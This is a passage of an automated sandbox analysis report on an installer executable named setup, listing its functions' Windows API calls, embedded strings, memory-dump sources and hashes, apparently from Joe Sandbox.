                                                                                                                                                                              • Opcode Fuzzy Hash: a4473bbf9f503decba0e7483b31eca65fff1e717c1630b579ce9787749cead10
                                                                                                                                                                              • Instruction Fuzzy Hash: E6B155729042469FDF118F68C881BEEBBE5EF5B740F19816AE805EB241DA34DD05DBB0
                                                                                                                                                                              Function 00BC3E40 Relevance: 6.1, APIs: 4, Instructions: 87timeCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • KillTimer.USER32(00000003,00000001,02141699,?,?,?,?,00DAD844,000000FF), ref: 00BC3E81
                                                                                                                                                                              • GetWindowLongW.USER32(00000003,000000FC), ref: 00BC3E96
                                                                                                                                                                              • SetWindowLongW.USER32(00000003,000000FC,?), ref: 00BC3EA8
                                                                                                                                                                              • DeleteCriticalSection.KERNEL32(?,02141699,?,?,?,?,00DAD844,000000FF), ref: 00BC3ED3
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: LongWindow$CriticalDeleteKillSectionTimer
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1032004442-0
                                                                                                                                                                              • Opcode ID: 536fe4422b0f5edc354bb22bd00271164f06e6c791f72eafb52597f1c530ef6a
                                                                                                                                                                              • Instruction ID: d3e5998315406d7116c1b544f60b68caa2ca82015d90138486270c434b07b193
                                                                                                                                                                              • Opcode Fuzzy Hash: 536fe4422b0f5edc354bb22bd00271164f06e6c791f72eafb52597f1c530ef6a
                                                                                                                                                                              • Instruction Fuzzy Hash: 2531A071904246AFCB20DF25DC44B9ABBF4FB05710F14826AE814E3691D7B1EA14CBA0
                                                                                                                                                                              Function 00BC5CE0 Relevance: 5.7, Strings: 4, Instructions: 696COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: AI_CONTROL_VISUAL_STYLE$AI_CONTROL_VISUAL_STYLE_EX$AI_NO_BORDER_HOVER$AI_NO_BORDER_NORMAL
                                                                                                                                                                              • API String ID: 0-932585912
                                                                                                                                                                              • Opcode ID: 362d57c5e725bab7b588e783d34e28f954371e9c9bfed7ee7171bc8e30889692
                                                                                                                                                                              • Instruction ID: a8de9351d73e2b18f243d8f9d42908dcd74f0caaf71ee15aaa83c11cc3addd3f
                                                                                                                                                                              • Opcode Fuzzy Hash: 362d57c5e725bab7b588e783d34e28f954371e9c9bfed7ee7171bc8e30889692
                                                                                                                                                                              • Instruction Fuzzy Hash: 5642C071D002188BDB18CF68C894FAEB7F1EF85300F14829DE495AB396D774AA45CBA1
                                                                                                                                                                              Function 00BD8630 Relevance: 5.4, Strings: 4, Instructions: 356COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: <> "$ = "$Hide$Show
                                                                                                                                                                              • API String ID: 0-289022205
                                                                                                                                                                              • Opcode ID: 6c6ff1ac59766bbfacf4ab0f46998911c9b0b92268ab70ea938326e20af8e320
                                                                                                                                                                              • Instruction ID: e94ddad3d5c7a609bc725def66fb1df5b625b7917c8efabcc4beda6328b4a80d
                                                                                                                                                                              • Opcode Fuzzy Hash: 6c6ff1ac59766bbfacf4ab0f46998911c9b0b92268ab70ea938326e20af8e320
                                                                                                                                                                              • Instruction Fuzzy Hash: B6F15C70D04259DFDB24DF64CC55BAEB7B1BF55304F1082DAE0097B291EB74AA84CBA1
                                                                                                                                                                              Function 00BC9AD0 Relevance: 5.3, Strings: 4, Instructions: 345COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: MultipleInstances$MultipleInstancesProps$OldProductCode$ProductCode
                                                                                                                                                                              • API String ID: 0-469785651
                                                                                                                                                                              • Opcode ID: 666cfe8b21fbb9719074acd65ed4f730092ba5198c862e9ccbfd946f5478cdea
                                                                                                                                                                              • Instruction ID: 65902b9cdc33327927f7d934cefaeb851c044749275f99aaa621e242a279da0b
                                                                                                                                                                              • Opcode Fuzzy Hash: 666cfe8b21fbb9719074acd65ed4f730092ba5198c862e9ccbfd946f5478cdea
                                                                                                                                                                              • Instruction Fuzzy Hash: 7FC1C235A00202DBEB18DF58C899FBAB7F2FF95714B5541EDD8026B244EB30AD45CBA0
                                                                                                                                                                              Function 00D7D0F2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • VirtualQuery.KERNEL32(80000000,00D7D037,0000001C,00D7D22C,00000000,?,?,?,?,?,?,?,00D7D037,00000004,00E9FA78,00D7D2BC), ref: 00D7D103
                                                                                                                                                                              • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00D7D037,00000004,00E9FA78,00D7D2BC), ref: 00D7D11E
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InfoQuerySystemVirtual
                                                                                                                                                                              • String ID: D
                                                                                                                                                                              • API String ID: 401686933-2746444292
                                                                                                                                                                              • Opcode ID: a63fa266fa62cbb4cec11cd53a17453996f30fbcf38de3943b564edfebff42d1
                                                                                                                                                                              • Instruction ID: 744919a1a72a04fb5321e1d61887d7307aa3bf9f0616cd1d558112aadcd6b2dd
                                                                                                                                                                              • Opcode Fuzzy Hash: a63fa266fa62cbb4cec11cd53a17453996f30fbcf38de3943b564edfebff42d1
                                                                                                                                                                              • Instruction Fuzzy Hash: BE01F732600209ABCB14DF29CC05BDE7BBAAFC4324F0CC220ED1DD7245E638D845C690
                                                                                                                                                                              Function 00D7F583 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00BBAD10: InitializeCriticalSectionAndSpinCount.KERNEL32(00E9FEF0,00000000,02141699,00BA0000,Function_00207E40,000000FF,?,00D7F5B2,?,?,?,00BA7726), ref: 00BBAD35
                                                                                                                                                                                • Part of subcall function 00BBAD10: GetLastError.KERNEL32(?,00D7F5B2,?,?,?,00BA7726), ref: 00BBAD3F
                                                                                                                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,00BA7726), ref: 00D7F5B6
                                                                                                                                                                              • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00BA7726), ref: 00D7F5C5
                                                                                                                                                                              Strings
                                                                                                                                                                              • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00D7F5C0
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CountCriticalDebugDebuggerErrorInitializeLastOutputPresentSectionSpinString
                                                                                                                                                                              • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                                              • API String ID: 450123788-631824599
                                                                                                                                                                              • Opcode ID: eaa260a03971f233b20860b01f24c1ae51ee5d10b08c2ca185e3529b46a6f4dd
                                                                                                                                                                              • Instruction ID: 4f4eb45a9cf6ce994a473ba2cd8213bf5d007af5b9c14db323698b0f3cc14360
                                                                                                                                                                              • Opcode Fuzzy Hash: eaa260a03971f233b20860b01f24c1ae51ee5d10b08c2ca185e3529b46a6f4dd
                                                                                                                                                                              • Instruction Fuzzy Hash: DDE092702057508FC330AF69D9543427BE4AF04310F108E6DE446E3690EBB1E488CB71
                                                                                                                                                                              Function 00BA7620 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetVersionExW.KERNEL32 ref: 00D79808
                                                                                                                                                                              • GetVersionExW.KERNEL32(?), ref: 00D79853
                                                                                                                                                                              • IsProcessorFeaturePresent.KERNEL32(00000011), ref: 00D79867
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Version$FeaturePresentProcessor
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1871528217-0
                                                                                                                                                                              • Opcode ID: 19008f2b79463e290309f60cad83677e3b191b2e6f43376b2940e002e461fec9
                                                                                                                                                                              • Instruction ID: b3f60175c6f272452424afcc1d49cf0cef8ec1ba282ae1203d220ee9acc8f020
                                                                                                                                                                              • Opcode Fuzzy Hash: 19008f2b79463e290309f60cad83677e3b191b2e6f43376b2940e002e461fec9
                                                                                                                                                                              • Instruction Fuzzy Hash: 0D613B72B006204FE318CF2D8C916AABBD5DBCA341F05463FE49AD7291E678D509CBB1
                                                                                                                                                                              Function 00BC00C0 Relevance: 4.6, APIs: 3, Instructions: 93COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • IsWindow.USER32(00000004), ref: 00BC010E
                                                                                                                                                                              • GetWindowLongW.USER32(00000004,000000FC), ref: 00BC0127
                                                                                                                                                                              • SetWindowLongW.USER32(00000004,000000FC,?), ref: 00BC0139
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$Long
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 847901565-0
                                                                                                                                                                              • Opcode ID: 230d271388d9746dfa520800be796a43dbcbf41bdd6ca60ea2a566677156e2f4
                                                                                                                                                                              • Instruction ID: 745eb3b07e11ba3e99790a22dd482b55ebada79bf8baaf8c42cd15d0e1af4625
                                                                                                                                                                              • Opcode Fuzzy Hash: 230d271388d9746dfa520800be796a43dbcbf41bdd6ca60ea2a566677156e2f4
                                                                                                                                                                              • Instruction Fuzzy Hash: EE4168B0600602EFDB10DF65C908B5AFBE4FF05314F14426DE524EBA91DBB6E924CBA0
                                                                                                                                                                              Function 00D84FE3 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00D850DB
                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00D850E5
                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,?), ref: 00D850F2
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3906539128-0
                                                                                                                                                                              • Opcode ID: 06a674997ea5211cdc00eb7dd81e95033f17d54e1820ffeadab431db01d662ee
                                                                                                                                                                              • Instruction ID: c4a306d6137e0842e3792f84f2205595d81ba0e8bad2f3935b739b3ca33836d8
                                                                                                                                                                              • Opcode Fuzzy Hash: 06a674997ea5211cdc00eb7dd81e95033f17d54e1820ffeadab431db01d662ee
                                                                                                                                                                              • Instruction Fuzzy Hash: 9D31C4749013189BCB21EF64DD897CDBBB4BF08310F6042EAE40CA7261E7709B858F54
                                                                                                                                                                              Function 00BAA160 Relevance: 4.6, APIs: 3, Instructions: 65COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • LoadResource.KERNEL32(00000000,00000000,02141699,00000001,00000000,?,00000000,00DA7BF0,000000FF,?,00BAA10C,02141699,?,?,*.*,?), ref: 00BAA18B
                                                                                                                                                                              • LockResource.KERNEL32(00000000,?,00BAA10C,02141699,?,?,*.*,?,00000000,00DA82C0,000000FF,?,00BAA2B0,?,?,*.*), ref: 00BAA196
                                                                                                                                                                              • SizeofResource.KERNEL32(00000000,00000000,?,00BAA10C,02141699,?,?,*.*,?,00000000,00DA82C0,000000FF,?,00BAA2B0,?,?), ref: 00BAA1A4
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Resource$LoadLockSizeof
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2853612939-0
                                                                                                                                                                              • Opcode ID: 8f445207aecab7b3178d21eecc4644dad4f1b47e9391f29e361c428f97521fa2
                                                                                                                                                                              • Instruction ID: bd94431147805ebbbb43f9609fdf9da6a5ff7c27111cc6036b384f7cbeea7650
                                                                                                                                                                              • Opcode Fuzzy Hash: 8f445207aecab7b3178d21eecc4644dad4f1b47e9391f29e361c428f97521fa2
                                                                                                                                                                              • Instruction Fuzzy Hash: 7211E736A04654AFD7309F69DC40B76B7ECE78A720F104A6BEC1AE3240E7359C00C6A0
                                                                                                                                                                              Function 00BB8C40 Relevance: 4.5, APIs: 3, Instructions: 28COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetWindowLongW.USER32(0000001B,000000FC), ref: 00BB8C59
                                                                                                                                                                              • SetWindowLongW.USER32(0000001B,000000FC,?), ref: 00BB8C67
                                                                                                                                                                              • DestroyWindow.USER32(0000001B), ref: 00BB8C93
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$Long$Destroy
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3055081903-0
                                                                                                                                                                              • Opcode ID: de7f6648191317e1a9b78cfe14a63fcb1f7f1b89648ef506dc65099b5d8dc02c
                                                                                                                                                                              • Instruction ID: cefd45eb2d1af81b922c86aa50a572703c49e21b289a18440ce453cf28565e30
                                                                                                                                                                              • Opcode Fuzzy Hash: de7f6648191317e1a9b78cfe14a63fcb1f7f1b89648ef506dc65099b5d8dc02c
                                                                                                                                                                              • Instruction Fuzzy Hash: 20F06D71005B109BCB615B29ED04B92BBE0FB04321B004B6AE4AAD15F1CBA0A844CB90
                                                                                                                                                                              Function 00D260D0 Relevance: 4.1, Strings: 3, Instructions: 314COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: ) AND ( $Show$gfff
                                                                                                                                                                              • API String ID: 0-344708357
                                                                                                                                                                              • Opcode ID: cf00af4d81e8686301c99ac05980fd74c3b18524d5f5db597bf2b1e6d67efb03
                                                                                                                                                                              • Instruction ID: 9d20dae9b221c7193bbe69b42e6a6ca5dcf50d4074acb9d3fa4c065c3792bfdc
                                                                                                                                                                              • Opcode Fuzzy Hash: cf00af4d81e8686301c99ac05980fd74c3b18524d5f5db597bf2b1e6d67efb03
                                                                                                                                                                              • Instruction Fuzzy Hash: DBD18A71904268CFDB24DF68C845BAEBBF1AF55304F1442D9E449BB281DB70AE84CBA1
                                                                                                                                                                              Function 00D00290 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 76timeCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetLocalTime.KERNEL32(?,02141699), ref: 00D002EE
                                                                                                                                                                                • Part of subcall function 00BAACF0: GetProcessHeap.KERNEL32 ref: 00BAAD45
                                                                                                                                                                                • Part of subcall function 00BAACF0: __Init_thread_footer.LIBCMT ref: 00BAAD77
                                                                                                                                                                                • Part of subcall function 00BAACF0: __Init_thread_footer.LIBCMT ref: 00BAAE02
                                                                                                                                                                              Strings
                                                                                                                                                                              • %04d-%02d-%02d %02d-%02d-%02d, xrefs: 00D00330
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Init_thread_footer$HeapLocalProcessTime
                                                                                                                                                                              • String ID: %04d-%02d-%02d %02d-%02d-%02d
                                                                                                                                                                              • API String ID: 219929307-3768011868
                                                                                                                                                                              • Opcode ID: 379b20d9c6fe0e098901a25d945ffc111591dab4996e06e8d2937686c5f396ee
